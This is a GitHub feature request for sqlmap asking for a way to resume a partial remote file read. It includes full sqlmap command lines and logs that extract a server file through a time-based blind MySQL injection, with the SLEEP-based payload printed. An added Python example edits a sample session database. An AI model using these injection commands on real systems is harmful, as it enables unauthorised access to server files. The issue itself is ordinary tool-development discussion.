Feature request: continue reading of partially read file #4756

Open
lager1 opened this issue Aug 2, 2021 · 0 comments

Comments

@lager1

lager1 commented Aug 2, 2021

Is your feature request related to a problem? Please describe.
When trying to read a file from a remote system in unstable conditions it can happen that the file is read only partially. Further reading attempts result only in checking whether the remote and local file are the same. I'm aware that there is a possibility of using --fresh-queries, but using this when the data exfiltration takes a very long time is not a good option.

I've found that I can manually convince sqlmap to continue reading the file by prepending the string __PARTIAL_VALUE__ to the partially read value in sqlmap's sqlite database. After doing that and running sqlmap again, the file reading process continues where the last run ended. Can this be implemented, for example, as a command line option? (maybe --continue-file-read?) I'd submit a PR for this but I'm too unfamiliar with the project structure to make any changes myself.

Describe the solution you'd like
I'd like to have the opportunity to continue reading a file which has been read only partially due to instability or other errors.

Describe alternatives you've considered
The only alternative that I've found is manually editing sqlmap's sqlite database, which could be considered a viable solution too, but it's a bit hacky in my opinion and I don't think it's documented anywhere as a possibility when a file is read only partially and the intent is to read the rest of the file.

Additional context
sqlmap logs which demonstrate the issue (partially redacted):

sqlmap -v 1 -u 'http://1.2.3.4/some/real/url' --data 'param1=value1&param2=value2' -p param1,param2 --batch --file-read /home/user/real/directory/structure/some/file.txt --fresh-queries
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.5.7#stable}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:12:45 /2021-08-01/

[09:12:45] [INFO] resuming back-end DBMS 'mysql'
[09:12:45] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: param1=value1' AND (SELECT 3267 FROM (SELECT(SLEEP(5)))FbUU) AND 'vlfD'='vlfD&param2=value2
---
[09:12:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[09:12:46] [INFO] fingerprinting the back-end DBMS operating system
[09:12:49] [INFO] the back-end DBMS operating system is Linux
[09:12:49] [INFO] fetching file: '/home/user/real/directory/structure/some/file.txt'
[09:12:49] [INFO] retrieved:
[09:12:49] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
6
[09:13:04] [INFO] adjusting time delay to 1 second due to good response times
6726F6D20...

....

[09:17:07] [ERROR] invalid character detected. retrying..
[09:17:07] [WARNING] increasing time delay to 2 seconds

....

[13:59:31] [INFO] adjusting time delay to 1 second due to good response times
4732...
[14:16:59] [ERROR] invalid character detected. retrying..
[14:16:59] [WARNING] increasing time delay to 2 seconds
...1676520
[14:22:22] [WARNING] turning off pre-connect mechanism because of connection reset(s)
[14:22:22] [CRITICAL] connection reset to the target URL. sqlmap is going to retry the request(s)
[14:22:22] [CRITICAL] connection reset to the target URL

[*] ending @ 14:22:22 /2021-08-01/

I think that the issue happens in the following run, where sqlmap thinks that the file has been (?) fully read.

sqlmap -v 1 -u 'http://1.2.3.4/some/real/url' --data 'param1=value1&param2=value2' -p param1,param2 --batch --timeout 90 --retries 5 --file-read /home/user/real/directory/structure/some/file.txt
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.5.7#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:40:59 /2021-08-01/

[14:40:59] [INFO] resuming back-end DBMS 'mysql'
[14:40:59] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: param1=value1' AND (SELECT 3267 FROM (SELECT(SLEEP(5)))FbUU) AND 'vlfD'='vlfD&param2=value2
---
[14:40:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[14:40:59] [INFO] fingerprinting the back-end DBMS operating system
[14:40:59] [INFO] the back-end DBMS operating system is Linux
[14:40:59] [INFO] fetching file: '/home/user/real/directory/structure/some/file.txt'
[14:40:59] [INFO] resuming partial value: .... 1676520
[14:40:59] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[14:41:02] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
6

...

[16:19:35] [WARNING] turning off pre-connect mechanism because of connection reset(s)
[16:19:35] [CRITICAL] connection reset to the target URL. sqlmap is going to retry the request(s)
[16:19:35] [WARNING] detected HTTP code 'None' in validation phase is differing from expected '200'
[16:19:35] [ERROR] invalid character detected. retrying..

...

[16:19:35] [WARNING] increasing time delay to 4 seconds
0616...
[16:30:11] [ERROR] invalid character detected. retrying..
[16:30:11] [WARNING] increasing time delay to 5 seconds
[16:30:19] [ERROR] invalid character detected. retrying..
[16:30:19] [WARNING] increasing time delay to 6 seconds
0
[16:30:48] [ERROR] invalid character detected. retrying..
[16:30:48] [WARNING] increasing time delay to 7 seconds
...72656469
[16:47:42] [ERROR] invalid character detected. retrying..
[16:47:42] [WARNING] increasing time delay to 8 seconds

do you want confirmation that the remote file '/home/user/real/directory/structure/some/file.txt' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[16:47:59] [INFO] retrieved:
[16:48:12] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[16:48:12] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
files saved to [1]:
[*] /root/.sqlmap/output/1.2.3.4/files/_home_user_real_directory_structure_some_file.txt (size differs from remote file)

[16:48:12] [INFO] fetched data logged to text files under '/root/.sqlmap/output/1.2.3.4'

[*] ending @ 16:48:12 /2021-08-01/

Further reading attempts do not actually read any further data; sqlmap just reports the local and remote file size difference.

sqlmap -v 1 -u 'http://1.2.3.4/some/real/url' --data 'param1=value1&param2=value2' -p param1,param2 --batch --timeout 90 --retries 5 --file-read /home/user/real/directory/structure/some/file.txt
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.5.7#stable}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:21:46 /2021-08-01/

[17:21:46] [INFO] resuming back-end DBMS 'mysql'
[17:21:46] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: param1=value1' AND (SELECT 3267 FROM (SELECT(SLEEP(5)))FbUU) AND 'vlfD'='vlfD&param2=value2
---
[17:21:47] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[17:21:47] [INFO] fingerprinting the back-end DBMS operating system
[17:21:47] [INFO] the back-end DBMS operating system is Linux
[17:21:47] [INFO] fetching file: '/home/user/real/directory/structure/some/file.txt'
[17:21:47] [INFO] resumed: ....72656469
do you want confirmation that the remote file '/home/user/real/directory/structure/some/file.txt' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[17:21:47] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[17:21:50] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
11
[17:22:05] [INFO] adjusting time delay to 1 second due to good response times
889
[17:22:15] [INFO] the remote file '/home/user/real/directory/structure/some/file.txt' is larger (11889 B) than the local file '/root/.sqlmap/output/1.2.3.4/files/_home_user_real_directory_structure_some_file.txt' (2881B)
files saved to [1]:
[*] /root/.sqlmap/output/1.2.3.4/files/_home_user_real_directory_structure_some_file.txt (size differs from remote file)

[17:22:15] [INFO] fetched data logged to text files under '/root/.sqlmap/output/1.2.3.4'

[*] ending @ 17:22:15 /2021-08-01/
sqlmap -v 1 -u 'http://1.2.3.4/some/real/url' --data 'param1=value1&param2=value2' -p param1,param2 --batch --timeout 90 --retries 5 --file-read /home/user/real/directory/structure/some/file.txt --repair
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.5.7#stable}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:52:44 /2021-08-01/

[17:52:44] [INFO] resuming back-end DBMS 'mysql'
[17:52:44] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: param1=value1' AND (SELECT 3267 FROM (SELECT(SLEEP(5)))FbUU) AND 'vlfD'='vlfD&param2=value2
---
[17:52:44] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.04 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[17:52:44] [INFO] fingerprinting the back-end DBMS operating system
[17:52:45] [INFO] the back-end DBMS operating system is Linux
[17:52:45] [INFO] fetching file: '/home/user/real/directory/structure/some/file.txt'
[17:52:45] [INFO] resumed: ...72656469
do you want confirmation that the remote file '/home/user/real/directory/structure/some/file.txt' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[17:52:45] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[17:52:47] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
11
[17:53:03] [INFO] adjusting time delay to 1 second due to good response times
889
[17:53:12] [INFO] the remote file '/home/user/real/directory/structure/some/file.txt' is larger (11889 B) than the local file '/root/.sqlmap/output/1.2.3.4/files/_home_user_real_directory_structure_some_file.txt' (2881B)
files saved to [1]:
[*] /root/.sqlmap/output/1.2.3.4/files/_home_user_real_directory_structure_some_file.txt (size differs from remote file)

[17:53:12] [INFO] fetched data logged to text files under '/root/.sqlmap/output/1.2.3.4'

[*] ending @ 17:53:12 /2021-08-01/
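The manual workaround described in the post (prepending __PARTIAL_VALUE__ to the stored value in sqlmap's session database), as an added example that is not part of the issue or of sqlmap's own code. It runs against a constructed in-memory copy of the session database; the storage(id, hash, value) table layout and the sample rows are assumptions made so the example works offline.

```python
import sqlite3

# Marker the issue reports sqlmap uses to flag a partially retrieved value.
PARTIAL_VALUE_MARKER = "__PARTIAL_VALUE__"


def open_sample_session():
    """Return a constructed, in-memory stand-in for sqlmap's session.sqlite.

    The table layout 'storage(id, hash, value)' is an assumption made so the
    example runs offline; the hashes and hex values are made up.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE storage (id INTEGER PRIMARY KEY, hash INTEGER, value TEXT)")
    conn.executemany(
        "INSERT INTO storage (id, hash, value) VALUES (?, ?, ?)",
        [
            (1, 1001, "Linux"),                        # unrelated cached answer
            (2, 1002, "6726F6D20473272656469"),        # hex tail of the partial read
            (3, 1003, PARTIAL_VALUE_MARKER + "0616"),  # already flagged as partial
        ],
    )
    conn.commit()
    return conn


def is_partial(value):
    """True when the stored value carries the marker, i.e. retrieval should resume, not stop."""
    return value.startswith(PARTIAL_VALUE_MARKER)


def mark_partial(conn, fragment):
    """Prepend the marker to every stored value ending in `fragment`.

    `fragment` is the tail sqlmap printed as 'resumed: ...'; it is used as a
    plain suffix match (hex digits contain no LIKE wildcards). Rows already
    flagged are skipped, so the call is idempotent. Returns the changed ids.
    """
    rows = conn.execute("SELECT id, value FROM storage WHERE value LIKE ?", ("%" + fragment,)).fetchall()
    changed = []
    for row_id, value in rows:
        if is_partial(value):
            continue
        conn.execute("UPDATE storage SET value = ? WHERE id = ?", (PARTIAL_VALUE_MARKER + value, row_id))
        changed.append(row_id)
    conn.commit()
    return changed


def stored_value(conn, row_id):
    """Fetch one stored value by id (helper for inspection)."""
    return conn.execute("SELECT value FROM storage WHERE id = ?", (row_id,)).fetchone()[0]
```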